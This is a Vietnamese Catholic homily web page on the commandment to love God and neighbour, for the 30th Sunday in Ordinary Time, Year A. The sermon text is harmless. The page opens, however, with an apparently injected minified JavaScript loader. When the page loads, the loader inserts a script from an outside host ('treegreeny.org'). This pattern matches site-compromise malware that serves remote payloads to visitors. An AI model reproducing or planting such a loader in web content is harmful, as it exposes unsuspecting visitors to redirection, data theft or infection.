;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); MẾN CHÚA – YÊU NGƯỜI CẦU NỐI SUỐI NGUỒN YÊU THƯƠNG – Xitô PS

MẾN CHÚA – YÊU NGƯỜI CẦU NỐI SUỐI NGUỒN YÊU THƯƠNG

Chúa Nhật XXX Thường Niên Năm A

(Xh 22, 20-26; Tx 1, 5c-10; Mt 22, 34-40)

Với người Do thái: “Luật pháp Chúa là hoàn thiện, bổ sức cho tâm hồn, quý hơn vàng, ngọt hơn mật”. Thánh luật ấy bị chế thành rừng luật, người ta không biết đâu chính đâu phụ. Luật trở nên gánh nặng, nỗi ám ảnh của dân. Hôm nay Đức Giê su xác định cốt yếu của luật là: Mến Chúa và yêu người. Đây là khoản luật ngắn nhất, nhưng khó giữ, khó sống nhất.

Số đông cho rằng mến Chúa thì dễ, yêu người mới khó. Yêu Chúa dễ bởi Chúa vô hình, ta yêu bằng sự phóng chiếu và cảm giác của ta. Yêu người khó, bởi không thể yêu bằng cảm tính, vì người ta là nhân vị sống động, có cá tính và cảm giác khác với ta. Nên yêu người là phải yêu sự khác biệt, yêu cả khuyết điểm cả trái ý cực lòng nên khó thương, khó yêu người.

Số khác lại cho yêu Chúa khó, yêu người dễ. Yêu Chúa khó vì Chúa vô hình, yêu mà chẳng thấy cảm giác của sự hồi đáp, yêu bằng trí tưởng tượng nên mau chán vì không thực tế. Họ cho rằng yêu người dễ, vì người ta sống động trực diện trước mặt với tất cả vẻ đẹp và cuốn hút, nhất là có sự tương tác khi yêu.

Nhưng cả hai quan niệm trên chỉ dừng lại ở nghĩa chữ, cảm tính chứ chẳng phải là tinh thần của luật. Thánh Gioan nói: “nếu ai nói tôi yêu mến Thiên Chúa, mà lại ghét anh em mình, người ấy là kẻ nói dối; vì ai không yêu thương người anh em mà họ trông thấy, thì không thể yêu mến Thiên Chúa mà họ không trông thấy”. Tất yếu của sự chu toàn luật này là song đối mến Chúa- yêu người không thể tách rời. Thế nhưng, Thiên Chúa không ra luật để đánh đố con người. Luật Chúa là đường dẫn con người bước đi và đạt tới đích điểm Thiên Chúa muốn dành cho họ. Vậy làm gì để chu toàn Thánh Luật này?

Để có thể yêu người, bài đọc I, sách Xuất hành cho ta một giải pháp, hãy nhớ tới án phạt Thiên Chúa dành cho những kẻ không yêu thương đồng loại: “nếu ngươi ức hiếp mà nó kêu cứu Ta, ắt Ta sẽ nghe tiếng nó kêu cứu. Cơn giận Ta sẽ bốc lên, Ta sẽ cho gươm chém giết các ngươi”. Nhớ tới án phạt cho kẻ không biết thương yêu, xem có vẻ tiêu cực nhưng là cách tốt giúp người ta biết quan tâm và chia sẻ với đồng loại hơn.

Để mến Chúa, ở bài đọc II thánh Phao lô khuyên: hãy “từ bỏ ngẫu tượng mà quay về với Chúa, để phụng thờ Thiên Chúa hằng sống, Thiên Chúa chân thật” và chờ đợi Con của Người đến cứu độ. Trước đó, ngài nói: phải “noi gương Chúa”. Noi gương Chúa như thế nào? Chúa Giê su nói: “Như Cha đã yêu mến Thầy thế nào, Thầy cũng yêu mến anh em như vậy. Anh em hãy yêu thương nhau, như Thầy đã yêu thương anh em”. Yêu phải làm gì? Yêu là làm cho nhau được sống và sống dồi dào. Thiên Chúa yêu và ban sự sống cho chúng ta; đến lượt chúng ta, yêu cũng là trao hiến sức sống cho người, là giúp nhau vượt qua khổ đau và sống hạnh phúc, nhất là được làm con Chúa, là anh em của nhau.

Điều răn mến Chúa yêu người là một cầu nối, một dòng suối lưu thông tình yêu và sự sống của Thiên Chúa trong con người. Thiên Chúa mong sức sống yêu thương ấy, không bị ngắt quãng ở bất cứ chỗ nào do lòng ích kỉ của một ai đó, nhưng luôn tuôn tràn tới tất cả mọi người. Nên Ngài dứt khoát với người không thương yêu đồng loại: “Ai không yêu thương thì không biết Thiên Chúa, vì Thiên Chúa là tình yêu”; và “ai không yêu thương thì ở lại trong sự chết, ai ghét anh em mình là kẻ sát nhân”.

Điều răn mến Chúa yêu người là kênh, là dòng chảy tình yêu và sự sống của Thiên Chúa cho con người, chứ không phải là khoản luật gò ép con người đến nỗi không thể thực hiện và nếu không thực hiện sẽ bị phạt. Khoản luật này là cách Thiên Chúa thông ban tình yêu và sự sống, vừa mời gọi con người trở nên những cầu nối yêu thương, và tiếp tục trao ban tình yêu và sự sống của Thiên Chúa cho mọi người.

Vậy xin Chúa ban ơn để mỗi ngày chúng ta chu toàn luật yêu thương này ngày tốt hơn. Chúng ta cùng tạ ơn Chúa về khoản luật yêu thương, qua hành động cùng nhau tuyên xưng đức tin.

FM. Tùy Phúc Hậu

You May Also Like

Trả lời

X